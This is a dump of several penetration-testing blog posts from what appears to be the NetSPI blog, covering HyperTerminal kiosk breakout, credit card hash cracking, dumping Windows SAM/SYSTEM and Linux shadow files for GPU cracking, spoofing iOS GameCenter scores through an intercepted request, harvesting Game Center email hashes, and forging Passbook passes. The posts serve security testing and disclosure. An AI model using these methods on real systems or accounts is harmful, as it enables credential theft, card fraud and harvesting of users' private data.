At this point, we will want to turn on the “Echo typed characters locally” setting, so we can see what we’re doing. This can be found under File -> Properties -> Settings Tab -> ASCII Setup. Hyperterm We will want to save the text that we’re typing to the HyperTerminal screen, so select Transfer, then Capture Text. Hyperterm Since the user we are using has rights to write to the startup folder, we are just going to save a batch file that will run at the user’s next logon (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\test.bat). You may not have rights to save there, but you might have access to save the file to another location that you could run the script from. Once the capture is started, type the command(s) that you want to run into the HyperTerminal window and stop the capture. Here we are just going to type cmd and stop, so that the script will pop up a cmd shell when we log in. You have plenty of other possible programs that you could run here. Hyperterm We can see in the example screen that the test.bat file was saved to the startup folder, and when the script is executed, a command shell pops up. Hyperterm

Conclusion

You may never have to use HyperTerminal to break out, but keep it in mind if you are locked out of other routes. For our sysadmin readers, don’t allow HyperTerminal on your terminals, kiosks, etc.
[post_title] => Quick! To the HyperTerminal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => quick-to-the-hyperterminal [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:56 [post_modified_gmt] => 2021-06-08 21:47:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1152 [menu_order] => 740 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [65] => WP_Post Object ( [ID] => 1158 [post_author] => 10 [post_date] => 2013-06-13 07:00:07 [post_date_gmt] => 2013-06-13 07:00:07 [post_content] => As penetration testers, we are frequently engaged to do penetration tests for PCI compliance. As a part of these penetration tests, we look for cardholder data (card numbers, CVVs, etc.) in files, network traffic, databases, and anywhere else we might be able to catch it. Oftentimes, we will find hashes of credit card numbers stored along with the first six and/or last four digits of the card number. Given that credit card numbers are a fixed length, this limits the keyspace that we need to use to brute force the hashes. The language in the PCI DSS is a little vague about how cardholder data needs to be hashed, but there is information in requirement 3.4 that helps. “Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
  • One-way hashes based on strong cryptography (hash must be of the entire PAN)
  • Truncation (hashing cannot be used to replace the truncated segment of PAN)
  • Index tokens and pads (pads must be securely stored)
  • Strong cryptography with associated key-management processes and procedures”
While this information is good, it does not ensure that the implementer of the hashing function is doing things correctly. “Strong cryptography” can be interpreted a number of different ways. One could argue that SHA256 is a strong hashing algorithm, therefore meeting the requirements. It does not take a significant amount of effort for us to try and brute force SHA256 hashes, so the strength of the algorithm is a moot point. This type of attack is actually called out as a footnote in the requirement. “Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity‘s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.” These “additional controls” could include salts for the hashes (frequently stored with the hash) or encrypting the truncated versions. There are a number of other potential controls that we could talk about, but that would be enough info for another post. Even with proper additional controls on the PAN data (truncated and hashed), the root of the issue is still the length of the card number and the limited keyspace that is needed for guessing the number. Given a (potentially) sixteen digit card number, the first six digits, and the last four digits, we are able to easily iterate through the  remaining six digits in a matter of minutes.  There are only a fixed number of IIN or BIN prefixes for cards (think the first 4-6 numbers of a card). These numbers are available online and pretty easy to find. Given a list of these numbers, we are able to reduce our cracking efforts for situations where hashes are only stored with the last four digits of the card number. 
Because credit card numbers must be Luhn valid, we can further reduce the number of guesses that we have to hash. Example Card Format: Cc For this example, we will use the TCF Debit Card BIN. With a million potential card numbers (000000 to 999999 for the middle digits) and a fixed last four of 1234, there are only 100,000 potential Luhn-valid card numbers in this space. In other words, the Luhn check cuts the cracking space down by ninety percent. This holds for any credit card number that you are brute forcing: since the last (or check) digit is fixed for a given stored hash, only one in ten candidate numbers will produce a valid checksum. Simply put, this works because you are never brute forcing the check digit. Time-wise, it takes about 30 minutes to get through this keyspace (for the example number above) on a 2.80 GHz Intel Core i7 processor. I also ran this test with several other programs open, so your results may vary. In general practice, I’ve seen most hashes crack within two minutes.
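The Luhn math above can be sketched in a few lines of Python (a standalone illustration, not the NetSPI tool; the first-six prefix and last four used below are made up for the demo):

```python
def luhn_valid(number: str) -> bool:
    """Return True if a digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9      # same as summing the two digits of the product
        total += d
    return total % 10 == 0

# Fix a made-up first six ("401234") and last four ("1234"), then vary a
# slice of the middle digits: exactly one in ten candidates is Luhn valid,
# which is the ninety percent reduction described above.
candidates = [f"401234{m:06d}1234" for m in range(1000)]
print(sum(luhn_valid(c) for c in candidates))  # 100
```

Changing any single digit of a candidate shifts the checksum through all ten residues, so for each fixed setting of the other digits exactly one value of that digit passes the check.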

Code

The code for cracking these hashes is actually quite simple. Read in the input file, iterate through the numbers that need guessing, and hash the Luhn-valid numbers. If the guess hash matches your input hash, it will write out your results to your output file. There’s also a small block in here to read in a list of IIN/BINs to use when you need to do guessing on the first 4-6 digits of the card number. You will have to provide your own list of these. Below is some sample output with the full card numbers and hashes redacted. Each period represents a Luhn-valid card number and is used to show the cracking status. Cc I’ve put the code out on the NetSPI GitHub for those who are interested: https://netspi.github.io/PS_CC_Checker/

Conclusion

The PCI DSS allows merchants to store partial card numbers, but not the full number. While the card number may not be stored in full, storing the hash of the card along with some of the digits allows an attacker to make educated guesses about the card number. This basically renders the hashing useless. While this is directly called out in requirement 3.4 of the DSS, we have found instances of hashes being stored with the truncated PAN data. Even without the truncated PAN data, the cracking effort for a card number hash is still reduced by the static IIN/BIN numbers associated with the card issuer. [post_title] => Cracking Credit Card Hashes with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-credit-card-hashes-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:32 [post_modified_gmt] => 2021-06-08 21:51:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1158 [menu_order] => 746 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [66] => WP_Post Object ( [ID] => 1160 [post_author] => 10 [post_date] => 2013-06-04 07:00:09 [post_date_gmt] => 2013-06-04 07:00:09 [post_content] => In the first blog of this series, we showed you how to set up the hardware for your own GPU cracking box. In the second blog of this series, we showed you how to set up the OS, drivers, and software for your own GPU cracking box. In this blog, we will simply go over common ways to get hashes along with methods and strategies for cracking the hashes. We will touch on most of these topics at a high level, and add links to help you get more information on each topic. Again, this is a pretty basic intro, but hopefully it will serve as a starter’s guide for those looking into password cracking.

Common Ways to Get Hashes

We could write an entire post on ways to capture hashes, but we will just touch on some common, high-level methods for getting them.

LM/NTLM

Some of the most common hashes that we crack are Windows LANMAN and/or NTLM hashes. For systems where you have file read rights on the SYSTEM and SAM files (local admin rights, web directory traversal, etc.), you will want to copy them off of the host for hash extraction. Windows XP/Vista/Server 2003 Paths:
  • C:\Windows\System32\config\SAM
  • C:\Windows\System32\config\SYSTEM
Windows 7 and Server 2008 Paths:
  • C:\Windows\System32\config\RegBack\SAM
  • C:\Windows\System32\config\RegBack\SYSTEM
Once you have these files, there are a number of tools that you can use to extract the hashes. Personally, I just import the files into Cain and export the hashes. If you have a Meterpreter session on the system and “NT AUTHORITY\SYSTEM” rights on the host, you can easily run the smart_hashdump module to dump out the local password hashes. Dumping hashes on a Server 2008 domain controller can be a little trickier; Pauldotcom has a great writeup on the process. Additionally, you can capture password hashes from the network with tools like Responder and the smb_capture module in Metasploit. These can be captured in both LM and NTLM formats. The LM format can be cracked with a combination of rainbow tables and brute forcing; I’ve also automated that process with a script. Cracking network NTLM hashes is now supported by oclHashcat. Previously, Cain was the only tool (that I knew of) that could crack them, and Cain was doing CPU cracking, not GPU cracking.

Linux Hashes

Dumping hashes from most Linux systems is fairly straightforward. If you have root access on the host, you can use the unshadow tool to get the hashes into a John-compatible format. Oftentimes you will only have arbitrary file read access; in that case, grab the /etc/shadow and /etc/passwd files for offline cracking of the hashes.

Web App Hashes

Many web applications store their password hashes in their databases, so those hashes may end up getting compromised through SQL injection or other attacks. Web content management systems (WordPress, Drupal, etc.), and more specifically their plugins, are also common targets for SQL injection and other attacks that expose password hashes. These hashes can vary in format (MD5, SHA1, etc.), but most that I have seen are unsalted, making them easier to crack. When web application hashes are salted, you may still get lucky and find the salts stored in the database alongside the hashes.

Cracking the Hashes

At this point we’re going to assume that you have taken the time to set up your hardware and software for cracking. If you want some tips, check out the links at the top of this post. For most cracking jobs, you will want to start with a simple dictionary attack. This will quickly catch any of the simple or commonly used passwords in your hashes. Given a robust dictionary, a good rule set, and a solid cracking box, you can crack a lot of passwords with little effort. Here are some basic dictionaries to get you started:
  • Skull Security has a great list (including the Rockyou list) of dictionaries
  • Crackstation has a 15 GB dictionary available with pay what you want/can pricing
  • A uniqued copy of Wikipedia can make for an interesting dictionary
You will probably want to get some hashes for benchmarking your cards’ or CPU’s performance. There are tons of possible benchmarking hashes in the cracking-requests sections on the InsidePro forums. Here you can frequently find large dumps of hashes from users requesting that someone crack their hashes for them. While the sources of these hashes are rarely disclosed, you could get a great sample of hashes to practice cracking. As for software, the three main pieces of cracking software that we use are Cain, John the Ripper, and oclHashcat. I won’t include commands on how to run those, as they are very well documented elsewhere.
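As a toy illustration of what a dictionary attack with mangling rules actually does (the wordlist and target hashes below are hypothetical, and real cracking should go through John or oclHashcat, which are vastly faster):

```python
import hashlib

# A few simple mangling rules, in the spirit of John/Hashcat rule sets.
RULES = (str.lower, str.capitalize, lambda w: w.lower() + "1")

def dictionary_attack(target_hashes: set[str], wordlist: list[str]) -> dict[str, str]:
    """Hash each mangled word and check it against unsalted MD5 targets."""
    cracked = {}
    for word in wordlist:
        for rule in RULES:
            guess = rule(word)
            digest = hashlib.md5(guess.encode()).hexdigest()
            if digest in target_hashes:
                cracked[digest] = guess
    return cracked

# Hypothetical "leaked" hashes of password1 and Summer.
targets = {hashlib.md5(b"password1").hexdigest(),
           hashlib.md5(b"Summer").hexdigest()}
print(sorted(dictionary_attack(targets, ["PASSWORD", "summer", "dragon"]).values()))
# ['Summer', 'password1']
```

Because the hashes are unsalted, one digest computation tests a guess against every target at once, which is exactly why salting matters.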

Conclusion

Hopefully this blog has given you some tips on getting started on gathering and cracking hashes. If you have any questions on the hardware, software, or anything else, feel free to leave us a comment. [post_title] => GPU Cracking: Putting It All Together [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-putting-it-all-together [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:53:36 [post_modified_gmt] => 2023-06-13 14:53:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1160 [menu_order] => 748 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [67] => WP_Post Object ( [ID] => 1166 [post_author] => 10 [post_date] => 2013-04-07 07:00:20 [post_date_gmt] => 2013-04-07 07:00:20 [post_content] =>

Intro

This winter, we decided to create our own dedicated GPU cracking solution to use for our assessments. It was quite the process, but we now have a fully functional hash cracking machine that tears through NTLMs at roughly 25 billion hashes per second (See below). While attempting to build this, we learned a lot about pushing the limits of consumer-grade hardware. We've recently updated this blog with more recent info - https://blog.netspi.com/gpu-cracking-rebuilding-box/

Goals

We set out to build a cracking rig with four high-end video cards (AMD Radeon HD 7950) to run oclHashcat. We also wanted this solution to be rack-mountable, so that it would be easy to store in our data center. As it turns out, there are not a ton of video-card-friendly server cases. We were only able to find a few, and most of them cost more than the rest of our cracking hardware combined. If you have the money to spend, we would recommend going with a specialized case to save yourself from other issues, but this isn’t really an option for everyone. The reason we recommend this is that the cards do not take well to being lined up together on a standard ATX motherboard. The fans tend to stick out further than they should and end up hitting the next card in the row. On top of that, the cramped conditions lead to overheating cards and stalled cracking jobs. The specialized cases have enough space to avoid these issues, making it easier to set up a box. We opted for an “open air” configuration for our cracking box. This was primarily driven by trying to mimic the setups of bitcoin mining rigs that we had seen online. I will say that this is not the prettiest option for housing all of these cards. However, it is one of the most efficient ways to space the cards out for cooling. With the “open air” setup, we’re able to connect riser cables to two of the cards and keep the other two cards down on the board. These riser cables can have their own problems. We ended up opting for one 16x-to-1x riser cable and a different 16x-to-16x riser cable that has some modifications for voltage. The 16x-to-16x cable has a 12-volt Molex adapter soldered to the 12-volt pins on the riser slot. GPU Cracker Blog 1 While this looks a little hackish, it actually works quite well. We had to do this to supplement the power from the motherboard, as it was unable to supply proper voltage for all four cards (with two riser cables).
I should also mention that there is some crafty engineering taking place to suspend the two cards above the board. This was accomplished with several zip ties and a modified piece of wire-mesh shelving. GPU Cracker Blog 1 B Note also that the whole rig is tied down (with stand-offs) to an old rack-mount shelf. All in all, this setup works quite well. We can have all four cards running at full speed, and the hottest card will top out at 85° Celsius. We’re very aware of the fact that this looks insane. It’s hopefully a temporary solution. Eventually, we’re looking at securing a single rail to the rack to screw the cards into. As for performance, here are our current averages for hash cracking (oclHashcat in brute-force mode): MD5 – ~16,000 M/s; NTLM – ~25,500 M/s; SHA1 – ~7,900 M/s. GPU Cracker Blog 1 C

5 Tips for Building Your Own

So if you’re planning on putting together your own GPU cracking rig, here are some steps that you may want to take to make it easier.
  1. Look into a nice GPU server case and motherboard combo like this one https://www.newegg.com/Product/Product.aspx?Item=N82E16816152125
    1. These will be spendy (~$3,500+ for the combo, cards not included) but they are meant for this kind of setup.
  2. Look at what the bitcoin miners are doing.
    1. Our “open-air” setup is actually pretty similar to most mining rigs that I can find.
    2. Replicate their parts list for your setup; if it works for them, it “should” work for you.
  3. Plan everything out as best you can.
    1. From components and case layout to power and cooling requirements.
    2. Measure twice and cut once to avoid returns, repairs, and rebuying parts.
  4. Devote a resource to the project
    1. Intern not busy enough? Have them build the cracking machine.
    2. Find the person that plays more PC games than you.
      1. They may know more about the cards and multi-GPU setups.
  5. Don’t get discouraged if your setup isn’t working.
    1. We didn’t get it right on the first try, but we eventually got there.
Check out GPU Cracking: Setting up the Server by Eric Gruber on how to configure your cracking box to see all of the cards and run the cracking software. [post_title] => GPU Cracking: Building the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-building-the-box [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1166 [menu_order] => 756 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [68] => WP_Post Object ( [ID] => 1170 [post_author] => 10 [post_date] => 2013-03-18 07:00:09 [post_date_gmt] => 2013-03-18 07:00:09 [post_content] => I recently wrote a blog post about cracking email hashes from the iOS GameCenter application. During my research on the issue, I noticed that there were a number of games where users had insanely high scores. Lots of the users also had the exact same score (9,223,372,036,854,775,807) for each of the games that they played. Not coincidentally, this number is the largest possible signed 64-bit integer value. It turns out that getting these high scores isn't that hard to do.

Setup

In order to modify our scores, we will need to proxy our iOS traffic through Burp. To properly intercept the encrypted iOS traffic, you will also need to install the Portswigger certificate on your iOS device. At this point, you will want your Burp listener to be on the same wireless network as your iOS device. You also need to have your Burp listener set to listen on all interfaces to allow your iOS device to proxy through it. The iOS proxy settings are fairly easy to set up. Just enter your Wi-Fi settings, tap on the blue and white arrow-in-a-circle (to the right of your SSID), and scroll down to your HTTP Proxy settings. Set the server IP to your Burp listener and set your port to the Burp listener port. Visit an HTTPS website on your iOS device to see if the Portswigger certificate is properly installed. If you don’t have any issues (or SSL warnings), you should be ready to go.

Modifying Scores

Once your iOS device is properly proxying traffic through your Burp listener, you will want to generate a score to post to GameCenter. For most games, this is not very hard to do. We will be using “Cut the Rope” as our example. Open up the first level, set Burp to intercept traffic, and complete the level (you cut one rope, it’s really easy). At this point you will see the “Level Complete” screen on your iOS device and the following request will come through Burp.
POST /WebObjects/GKGameStatsService.woa/wa/submitScores HTTP/1.1
Host: service.gc.apple.com
User-Agent: gamed/4.10.17.1.6.13.5.2.1 (iPhone4,1; 6.1.2; 10B146; GameKit-781.18)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Accept: */*
Some-Cookies: have been removed to make this shorter
Content-Type: application/x-apple-plist
Connection: keep-alive
Proxy-Connection: keep-alive
x-gk-bundle-version: 2.1
Content-Length: 473
x-gk-bundle-id: com.chillingo.cuttherope
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>scores</key>
    <array>
        <dict>
            <key>category</key>
            <string>1432673794</string>
            <key>context</key>
            <integer>0</integer>
            <key>score-value</key>
            <integer>12345</integer>
            <key>timestamp</key>
            <integer>1361998342937</integer>
        </dict>
    </array>
</dict>
</plist>
If you are seeing other requests come through, just forward them and keep your eye out for the request for the “submitScores” page. Before forwarding the score on to Apple, you will want to modify it. The highest possible value that you can submit is 9,223,372,036,854,775,807 (the largest signed 64-bit integer). Replace the “score-value” stored in the <integer> tags in the example above with 9223372036854775807 and forward the request. You should receive a “status 0” response from Apple and your score will be updated in GameCenter.
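The edit itself is just a change to one integer element in the plist body. As a sketch of what Burp's intercept window is doing for us, using Python's plistlib on a trimmed copy of the request body above:

```python
import plistlib

MAX_INT64 = 9223372036854775807  # the cap on a signed 64-bit score

intercepted_body = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>scores</key>
    <array>
        <dict>
            <key>category</key>
            <string>1432673794</string>
            <key>score-value</key>
            <integer>12345</integer>
        </dict>
    </array>
</dict>
</plist>"""

scores = plistlib.loads(intercepted_body)
scores["scores"][0]["score-value"] = MAX_INT64  # the one-field edit made in Burp
modified_body = plistlib.dumps(scores)          # re-serialize before forwarding
print(plistlib.loads(modified_body)["scores"][0]["score-value"])  # 9223372036854775807
```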
Gc

Conclusion

I don’t intend on modifying my high scores for each of my GameCenter games. I really don’t care that much about the scores, but some people do. Given Apple’s current model for GameCenter leaderboards, this may not be an easy fix. At a minimum, Apple may want to do some checking on these high scores to weed out any of the users that are maxing out their top scores. For now, I’m going to put the iPhone down and get some work done.
[post_title] => Hacking High Scores in iOS GameCenter [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-high-scores-in-ios-gamecenter [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:30 [post_modified_gmt] => 2021-06-08 21:51:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1170 [menu_order] => 759 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [69] => WP_Post Object ( [ID] => 1174 [post_author] => 10 [post_date] => 2013-02-11 07:00:09 [post_date_gmt] => 2013-02-11 07:00:09 [post_content] =>

Lately I've been looking at iOS. After looking into the Passbook application, I started poking around with the iOS Game Center application. The iOS Game Center allows iOS users to connect with friends, play games, and compare scores for their games. Think of it as Xbox Live for iOS.

Each Game Center user has an alias (or nickname, handle, etc.), a first and last name, and an email address tied to their account (also tied to your Apple ID). A user’s alias is publicly accessible by all Game Center users. The user’s first and last names are provided if they are shown in the “Friend Recommendations” feature or if they share a mutual friend with another user. If an email address is tied to an account, a SHA1 hash of the email address might also be accessible. Sometimes there’s more than one email address tied to an account, so multiple hashes will be returned when the account information is queried. Finally, each user has a playerID in the format of G:145811274 (my ID). This is the unique identifier used by Game Center to identify an account. I was only able to see this identifier while intercepting traffic.

For this attack, I proxied all of my traffic through the Burp Suite proxy. This allowed me to easily capture (and replay) all of the requests that Game Center was making to Apple servers. I did have to install the Portswigger CA certificate on my iPhone to intercept the SSL traffic. The prime targets for data enumeration were the “Friend Recommendations” and the friends of my friends list.

Since I wasn't really using Game Center, I had to add some friends. I started by gathering all of the playerIDs for everyone in my recommended friends. This list appeared to be populated by recommendations based on the people that I follow on Twitter and my Facebook friends. I also pulled down the top 150 users from the leaderboards to add to my list as well. I intercepted an add request with Burp, moved the request into the Intruder function, and used my list of playerIDs (~250 IDs total) to automate the friend request process. After adding several friends (~20), I requested that Game Center send me a list of all of the friends of my friends. I then added them to the list of people to friend request. I should also note that requesting over 500 people as friends will probably result in your iPhone/iPad/etc. exploding in notifications of friend approvals.

I should note here that it would be very easy to set up a script to run once a day, to pull down a list of friends of friends and automatically friend request everyone that is one hop away from me. 

Gc

Leader board listings

Gc

Listing of Friend Recommendations and the "Friends of a Friend" list

Attack

If you haven’t figured it out yet, the inference attack that I will demonstrate has to do with guessing the email address from the SHA1 hash. Since we already have an alias or handle for the user, along with the person’s first and last name, it’s not a long stretch for us to try and guess the email address(es) tied to their iTunes account. After enumerating all of the information available for my recommended friends and next-hop friends (friends of my friends), I wrote a quick PowerShell script to read the data and generate potential email addresses.

Considering most people (that I know) use some variation of their name or a handle for their email address, it was pretty easy to generate variations to use for guessing. To test multiple email domains, I appended each variation with hundreds of popular email domains. Below is a sample of the potential email user names that I tested:

  • kfosaaen@example.com 
  • k.fosaaen@example.com 
  • karlfosaaen@example.com 
  • karl.fosaaen@example.com 
  • karl.f@example.com
  • karlf@example.com 

After generating the potential emails, I then created SHA1 hashes of these email addresses and compared them to the hashes in the collected data. The script I used is really simple and may not have any practical use for you, but I put it out on GitHub: https://github.com/kfosaaen/EmailGenerator
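The published script is PowerShell; the idea can be sketched in Python like this (the names, alias, and domains below are hypothetical stand-ins):

```python
import hashlib
import itertools

def candidate_emails(first: str, last: str, alias: str, domains: list[str]):
    """Yield common name-based email guesses across a list of domains."""
    first, last, alias = first.lower(), last.lower(), alias.lower()
    local_parts = {alias, first + last, f"{first}.{last}",
                   first[0] + last, f"{first[0]}.{last}", first + last[0]}
    for local, domain in itertools.product(sorted(local_parts), domains):
        yield f"{local}@{domain}"

def match_hashes(target_sha1s: set[str], guesses) -> dict[str, str]:
    """SHA1 each guess and compare against the hashes Game Center hands out."""
    hits = {}
    for guess in guesses:
        digest = hashlib.sha1(guess.encode()).hexdigest()
        if digest in target_sha1s:
            hits[digest] = guess
    return hits

# One scraped record: alias plus first/last name, and a single leaked hash.
leaked = {hashlib.sha1(b"karl.fosaaen@example.com").hexdigest()}
hits = match_hashes(leaked, candidate_emails("Karl", "Fosaaen", "kfos",
                                             ["example.com", "example.net"]))
print(sorted(hits.values()))  # ['karl.fosaaen@example.com']
```

Because the hashes are unsalted SHA1, every guess costs a single digest computation, which is why a modest candidate list cracks a meaningful fraction of addresses.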

After I wrote the PowerShell script, I realized that I could just use HashCat to do the generation (and some brute forcing) for me. I just used the generated emails as my dictionary and some custom rules to help with the address guessing.

Results

By the end of my data collection, I had attempted to add over five hundred people as friends on Game Center. If you happened to be one of those people, I’m sorry. Overall, I was able to add 174 new friends to my Game Center account. Thanks to those friends, I was able to collect 1,635 records of Game Center ID, Alias, Email Hash, and Full Names. I actually stopped collecting records after I hit 45 friends, but I’m sure that I could get many more at this point. Those records also had to be pared down to remove special characters in user names, so the final list came out to 1,534 records. Of those, I was able to crack three hundred (19.5%) of the email addresses in about seven minutes.

This was all done over the course of about four days. Given more time and a better script for generating potential email addresses, I think that the percentage would be a lot higher for the collected email addresses. I did stop the attack at the point where I felt that I had a good proof-of-concept, as I really didn't care to harvest a ton of emails. I have been in contact with Apple about this since January 10th, so they've had a fair amount of time to deal with the issue on their end.

Conclusion

I know this isn't a groundbreaking attack that exposes tons of sensitive user data, but it’s important to note that if a piece of data is important enough to hash, it should be hashed well. It should also not be available to all users. From an attacker’s perspective, having this information would be very valuable to anyone trying to attack a specific iTunes account. If you’re a Game Center user, you can protect your info by turning off the “Public Profile” feature in the Game Center settings.

In order to fix the issue, Apple should consider the business need for returning SHA1 hashes of user email addresses. I don’t know what the hashes are currently being used for on the iPhone side, but there may be a need for them. If they are needed, then Apple should be salting these hashes to reduce the risk of an attacker cracking them.

[post_title] => Know Your Opponent – an Inference Attack Against iOS Game Center [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => know-your-opponent-an-inference-attack-against-ios-game-center [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:27 [post_modified_gmt] => 2021-06-08 21:51:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1174 [menu_order] => 763 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [70] => WP_Post Object ( [ID] => 1180 [post_author] => 10 [post_date] => 2012-12-12 07:00:09 [post_date_gmt] => 2012-12-12 07:00:09 [post_content] => With the release of iOS 6, Apple introduced the Passbook application. Currently there are sixteen different applications that support Passbook integration. The purpose of the Passbook application is to provide a one-stop application to manage all of your coupons, loyalty/gift cards, and tickets/boarding passes. This all sounds great, but what happens when an attacker abuses this service to get discounts or to access other peoples’ gift cards. This blog will show you how easy it is to intercept Passbook passes, modify them, and redeploy them to the Passbook application. The Passbook passes are typically generated by applications at the user’s request. The user tells the application that they want their coupon/ticket/etc. in their Passbook and the application calls out to its Passbook server. At this point, the Passbook server generates the pass and sends it back to the app to pass on to the user.

How can we break it?

Now there are already multiple services available that will generate Passbook passes for you. I’m not going to cover those here, as they have their own ways of creating passes and that’s not what we’re looking to do. In this blog, you’ll see how you can intercept a Passbook .pkpass file from the source and modify it for your own uses.

How to intercept the pass

The easiest way to intercept the Passbook URLs and/or files is by using a proxy. I have Burp Proxy set up on a laptop to intercept web traffic from my iPhone. Once you identify the Passbook request URLs (assuming the application uses HTTP for requests), you can easily replay the request (in a browser) from the intercepting host to get the .pkpass file. Additionally, you could sniff traffic on your wireless network and identify Passbook requests.

Deconstructing the .pkpass

Plain and simple, .pkpass files are zip files. All you have to do to access the internal files is unzip the file. Once unzipped, the three required files contained in the .pkpass folder are:
  • manifest.json (generated by Apple’s signpass tool)
  • pass.json (contains the Passbook pass data)
  • signature (a signature file for integrity checking)
Additional image files may be in the folder to be used by the pass (icon.png, thumbnail.png, strip.png), but those are all considered optional. If you are looking at an intercepted pass file, you will most likely find additional images used for the pass. The most interesting file is the pass.json file. A sample of the pass.json:
{
    "passTypeIdentifier" : "pass.com.ACME.MobileCoupon",
    "formatVersion" : 1,
    "organizationName" : "ACME Corporation",
    "serialNumber" : "ABCDX-12345",
    "teamIdentifier" : "A9BKD012",
    "logoText" : "",
    "description" : "ACME coupons.",
    "webServiceURL" : "https://PASSBOOKServer.com/passbook/",
    "authenticationToken" : "123456789123456789123456789",
    "suppressStripShine" : 1,
    "locations" : [
        {"latitude" : 44.989893, "longitude" : -93.279087}
    ]
}
Here are the important parts that you need to modify, if you’re going to regenerate your own pass.
  • passTypeIdentifier - This will later be changed to your identifier (see below)
  • teamIdentifier - This will also get changed to yours (also see below)
  • webServiceURL - You may just want to remove this one (otherwise the pass may phone home for updates)
  • authenticationToken - You may want to delete this too (it’s not going to get used by anything)
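To see how little work the modification step is, here is a rough Python sketch (function and file names are my own, not part of any official tooling) that unzips a pass, swaps the identifiers, and strips the update fields:

```python
import json
import os
import zipfile

def rework_pass(pkpass_path, out_dir, pass_type_id, team_id):
    """Unzip a .pkpass, update the identifiers, and drop the fields
    that would be invalid for a re-signed pass. The signature and
    manifest.json must still be regenerated with signpass afterward."""
    with zipfile.ZipFile(pkpass_path) as z:
        z.extractall(out_dir)
    pass_file = os.path.join(out_dir, "pass.json")
    with open(pass_file) as f:
        data = json.load(f)
    data["passTypeIdentifier"] = pass_type_id
    data["teamIdentifier"] = team_id
    # Remove update/auth fields so the pass doesn't phone home.
    data.pop("webServiceURL", None)
    data.pop("authenticationToken", None)
    with open(pass_file, "w") as f:
        json.dump(data, f, indent=2)
    return data
```

After this, delete the old signature and manifest.json from the output folder and re-run signpass as described below.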

How to create your own passes with signpass

At this point, I’m going to assume that you’re using a Mac to generate your passes. You can do this from Windows, but it’s a little more complicated (and a possible future blog post). Get yourself an iOS developer account with Apple. It’s $99 and you actually get some interesting stuff with it (assuming you’re into iOS). Once you have an account, you need to create a “New Pass Type ID” from the iOS Provisioning Portal. This pass type ID will be used by the pass.json file as the passTypeIdentifier and the teamIdentifier. You can follow the steps on Apple’s site to create the ID. Open the “configure” action on the Pass Type ID page and download the pass certificate. Once you download your certificate, install it to your OSX keychain and you should be good to sign your own passes.

The Apple developer site has the Passbook SDK available, which contains the signpass application for generating .pkpass files. The SDK actually provides several example passes that you can generate on your own for testing. In order to generate the actual .pkpass files, you will need to compile the signpass application in Xcode (the project is in the SDK files). This can be a pain if you’re not familiar with Xcode. Basically, you build the application in Xcode, click on “Products” (on the left), right click on signpass, and click “Show in Finder.” This will bring you to the compiled application, where you can copy it out to your Passbook directory.

Once you’ve compiled the signpass application, you can use it to generate the manifest.json and signature files. The application will also zip all the files into the .pkpass file. You can use your intercepted file that you unzipped earlier, but you will want to delete the signature and manifest.json files before you try to recreate the .pkpass file. You will also want to modify the pass.json parameters (passTypeIdentifier and teamIdentifier) to match the certificate you just downloaded from Apple.
Finally, since you’re working on a Mac, you need to delete any .DS_Store files that get created in your .pkpass folder. If there is a .DS_Store file in the folder and it isn’t caught by the manifest.json file, your pass will not be valid on the phone. Here’s an example of the .pkpass creation:
NetSPIs-MacBook-Pro:netspi NetSPI$ ./signpass -p NetSPI.raw/
2012-11-12 15:00:04.512 signpass[945:707] {
    "icon.png" = 575b58cc687b853935c63e800a63547a9c54572f;
    "icon@2x.png" = dbfca47b69c6f0c7fc452b327615bc98d7732d33;
    "logo.png" = d360269292d8cfe37f5566bba6fb643d012bef84;
    "logo@2x.png" = cdd3c98dd3044fe3d82bcea0cca944242cdcc6bf;
